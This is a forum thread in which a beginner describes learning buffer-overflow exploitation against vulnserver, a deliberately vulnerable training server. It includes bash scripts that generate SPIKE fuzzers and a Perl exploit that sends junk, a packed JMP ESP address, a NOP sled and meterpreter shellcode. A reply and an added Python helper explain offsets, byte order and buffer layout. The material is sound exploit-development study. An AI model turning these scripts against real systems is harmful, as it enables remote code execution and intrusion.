
Vulnserver And Ollydbg, I Need Some Help With Seh Chains


redcodefinal


Hi there, I'm new and wanted to introduce myself.

I am redcodefinal, I am 18 and live in California.

Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote one exploit for it, but I was hoping that someone could point me in the right direction for a couple of other exploitation methods that I am having trouble with. I will make these questions red so they're easier to find.

I'll start by telling you what I learned so that way there is no miscommunication.

First off, we use spike, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy)

#! /bin/bash
# Writes a minimal SPIKE script: read the banner line, send the command name,
# then a fuzzed string in place of the command's argument.
echo "Creates a fuzzer script for spike"
echo "Usage: ./createfuzzscript.sh [file] [command]"
if [ $# -ne 2 ]
	then
	  echo "WRONG ARGS!"

else
	touch "$1"
	echo "s_readline();" > "$1"
	echo "s_string(\"$2 \");" >> "$1"
	echo "s_string_variable(\"COMMAND\");" >> "$1"

	cat "$1"

	echo "Happy Fuzzing"
fi

Pretty simple so far. So next we fuzz the target command using spike's general_send_tcp program. If it crashes, it is possible that it is vulnerable to attack. We use Wireshark to trace back the packets; vulnserver tells you if the command completed successfully or not, and we look for TCP streams that don't have that at the end. I was doing this for the TRUN command, which happens to crash around 5000 bytes.

Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)

#! /bin/bash
# Generates a Perl script that connects to the target, prints the banner,
# then sends the command (header) followed by a cyclic pattern of the chosen size.
echo "This script will generate a Perl script used for general fuzzing"
echo "Be nice to it, it's still in its beta stages"
echo "USAGE: ./createplfuzz.sh [file]"
echo " " 
echo "What do you want the header to be?"
read header
echo "How big should the junk size be?"
read junksize
echo "IP address? (Say \$ARGV[0] to make it ask)"
read ip
echo "Port? (Say \$ARGV[1] to make it ask)"
read port

echo "Beginning Perl Script Maker"

echo '#! /usr/bin/perl' > "$1"
echo 'use IO::Socket;' >> "$1"
echo "\$header = \"$header\";" >> "$1"
# Metasploit's pattern_create.rb: every 4-byte window is unique, so the value
# that lands in EIP can be traced back to its offset with pattern_offset.rb.
junk=`/pentest/exploits/framework/tools/pattern_create.rb $junksize`
echo "\$junk = \"$junk\";" >> "$1"
echo '$socket = IO::Socket::INET->new(' >> "$1"
echo 'Proto => "tcp",' >> "$1"
echo "PeerAddr => \"$ip\"," >> "$1"
echo "PeerPort => \"$port\"," >> "$1"
echo ');' >> "$1"
echo '$socket->recv($serverdata, 1024);' >> "$1"
echo 'print $serverdata;' >> "$1"
echo "\$socket->send(\$header.\$junk);" >> "$1"

echo "DONE!"
cat "$1"
chmod +x "$1"
echo "Happy Fuzzing"

So basically, a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern, so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open OllyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program; I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command).

I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

Next we write our exploit.

Basically we just fill in that 2003-character space with junk values (for debugging purposes I just use 'A' (\x41)).

Next we grab a JMP ESP command from a dll it loads. The reason we do this is because most dlls won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into Little Endian format. I understand what Little Endian format is, but I don't understand why we need to pack the value like that. The line is

$eip = pack('V', 0x625011af);

Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here. The script is at the end of this section)

Next we make a NOP sled. I understand why we use it, however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (He used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire.

$socket->send($header.$junk.$eip.$nop.$shellcode);

Here is the Perl Exploit generation script.

#! /bin/bash
# Generates a Perl exploit skeleton: junk up to the EIP offset, the packed
# return address, a NOP sled and an msfpayload/msfencode shellcode, then sends it.
echo "This script will generate a Perl script used for exploit dev and testing"
echo "Be nice to it, it's still in its beta stages"
echo "USAGE: ./createplexploit.sh [file]"
echo " " 
echo "What do you want the header to be?"
read header
echo "How big should the junk size be?"
read junksize
echo "What is the EIP value?"
read eip
echo "How many NOPs should the sled contain?"
read nop
echo "What payload should we use?"
read payload
echo "What encoder should we use?"
read encoder
echo "What options do we want for the payload? (You should know these)"
read ploptions
echo "IP address? (Say \$ARGV[0] to make it ask)"
read ip
echo "Port? (Say \$ARGV[1] to make it ask)"
read port

echo "Beginning Perl Script Maker"

echo '#! /usr/bin/perl' > "$1"
echo 'use IO::Socket;' >> "$1"
echo "\$header = \"$header\";" >> "$1"
echo "\$junk = \"\\x41\" x $junksize;" >> "$1"
# pack('V') writes the address as 32-bit little-endian, the order x86 reads it in
echo "\$eip = pack('V', $eip);" >> "$1"
echo "\$nop = \"\\x90\" x $nop;" >> "$1"
# keep only the quoted "\x.." lines of msfencode's Perl output
shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'`
echo "\$shellcode = $shellcode" >> "$1"
echo '$socket = IO::Socket::INET->new(' >> "$1"
echo 'Proto => "tcp",' >> "$1"
echo "PeerAddr => \"$ip\"," >> "$1"
echo "PeerPort => \"$port\"," >> "$1"
echo ');' >> "$1"
echo '$socket->recv($serverdata, 1024);' >> "$1"
echo 'print $serverdata;' >> "$1"
echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> "$1"

echo "DONE!"
cat "$1"
chmod +x "$1"
echo "Happy Exploiting"

So the exploit works fine. Next, I wanted to try to make my own; however, I hit some roadblocks. The commands I tried were GMON, KSTET, and GTER. All crashed when I used the spike fuzzer. However, I run into the same problem with each of them: each one has an extremely small junk space (GMON was untraceable, I don't think it's overwriting EIP; KSTET only had 66 bytes; GTER only has 147 bytes). I noticed there isn't enough space for the shellcode. I first noticed it when I threw some breakpoints (\xCC) at the beginning and end of the shellcode. It would hit the first one but not the 2nd. Later I just changed the shellcode in my script to \x42 x 1000, and I noticed not all of the Bs showed up.

I know there are a couple of tricks to making shellcode execute from a different location, but the one I would prefer to use is overwriting the SEH chain. The SEH chain is an error-handling address that gets called when the program crashes; the SEH chain in vulnserver points to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

List of questions:

  • How does the JMP ESP address from a non-ASLR dll help us execute shellcode?
  • Why do we need to pack the EIP address in little endian format?
  • How do we know how many NOPs to use in our sled?
  • What is the proper method for overwriting SEH and hiding our shellcode somewhere else?




Welcome! Sorry for a short reply, I have over 9000 reasons why it's not awesome but hopefully it can get you over a hurdle.

1. How does the JMP ESP address from a non-ASLR dll help us execute shellcode?

If your payload is at the top of the stack (esp), then a jmp esp will direct execution to your payload.

2. Why do we need to pack the EIP address in little endian format?

In x86, all data types bigger than a word are expressed in little endian.

3. How do we know how many NOPs to use in our sled?

Use pattern_create.rb and pattern_offset.rb to find total size, subtract out payload and anything else you need to overwrite (addresses, etc). Just arithmetic.

4. What is the proper method for overwriting SEH and hiding our shellcode somewhere else?

Check out both parts of section 3 of the Corelan win32 exploit series:

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Sorry I don't have time to go more into detail, but you seem like a self-starter so I think you'll be alright :] Best of luck, and I wish you shells a-plenty.

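To make the offset tracing in the original post and the "just arithmetic" in answers 2 and 3 concrete, here is an added example (not code from the thread, from vulnserver, or from Metasploit): a small Python re-implementation of the idea behind pattern_create.rb / pattern_offset.rb, the Perl pack('V') byte order, and the buffer-layout subtraction. The 5000-byte TRUN crash, the 2003-byte EIP offset and the 0x625011af address are the figures quoted in the thread; the 350-byte shellcode length and the 50-byte offset in the small-buffer case are constructed placeholders.

```python
import itertools
import string
import struct

# One full cycle of the Aa0Aa1Aa2... pattern (26 * 26 * 10 three-byte chunks).
CYCLE = 26 * 26 * 10 * 3  # 20280 bytes


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the style of pattern_create.rb. Inside one cycle every
    4-byte window is unique, so whatever lands in EIP identifies its offset."""
    if length > CYCLE:
        raise ValueError("offsets would be ambiguous beyond one %d-byte cycle" % CYCLE)
    chunks = (u + l + d for u in string.ascii_uppercase
                        for l in string.ascii_lowercase
                        for d in string.digits)
    return "".join(itertools.islice(chunks, (length + 2) // 3))[:length].encode()


def pack_address(addr: int) -> bytes:
    """Equivalent of Perl's pack('V', addr): 32-bit little-endian. x86 stores the
    low byte first, so the address must be sent in this order for the CPU to read
    back the intended value when it loads the overwritten return address."""
    return struct.pack("<I", addr)


def eip_value_at(pattern: bytes, offset: int) -> int:
    """The number a debugger would display as EIP if pattern[offset:offset+4]
    were the saved return address (memory order -> integer)."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


def pattern_offset(eip: int, length: int) -> int:
    """Offset of the 4 pattern bytes that produced the displayed EIP, or -1 if the
    value did not come from the pattern (e.g. EIP was never overwritten, as the
    poster suspected for GMON)."""
    return pattern_create(length).find(pack_address(eip))


def layout(crash_length: int, eip_offset: int, shellcode_len: int, ret_len: int = 4) -> dict:
    """The arithmetic from answer 3: bytes left after the return address, and how
    many of them remain for a NOP sled once the shellcode is placed. A negative
    nop_sled means the buffer is too small, the KSTET/GTER situation."""
    after_ret = crash_length - eip_offset - ret_len
    nops = after_ret - shellcode_len
    return {"junk": eip_offset, "after_ret": after_ret, "nop_sled": nops, "fits": nops >= 0}


if __name__ == "__main__":
    pat = pattern_create(5000)
    seen = eip_value_at(pat, 2003)  # what OllyDbg would show after the crash
    print("EIP 0x%08x -> offset %d" % (seen, pattern_offset(seen, 5000)))
    print("pack('V', 0x625011af) ->", pack_address(0x625011af).hex())
    print("TRUN layout:", layout(5000, 2003, 350))
    print("66-byte buffer:", layout(66, 50, 350))
```

The subtraction assumes every byte after the return address actually reaches memory intact. The thread shows that is not always true: the \x42 x 1000 marker test revealed that not all of the Bs arrived for the small-buffer commands, so confirm the usable space in the debugger with marker bytes before trusting the numbers.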


Thank you very much! I went looking and the same guy who wrote some tutorials I used before made one on SEH; it's the same dude who made vulnserver.
